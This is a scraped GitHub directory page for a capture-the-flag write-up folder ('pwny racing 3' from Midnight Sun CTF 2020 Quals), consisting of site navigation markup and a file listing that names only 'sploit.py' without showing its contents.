<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%203","user_id":null}}" data-hydro-click-hmac="708645a931181d4e56823e36917fcd6065786747b4a12628bf213a7cdf5ddf37"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Midnight Sun CTF 2020 Quals</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwny racing 3<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Midnight Sun CTF 2020 Quals</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwny racing 3<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%203" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%203"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" 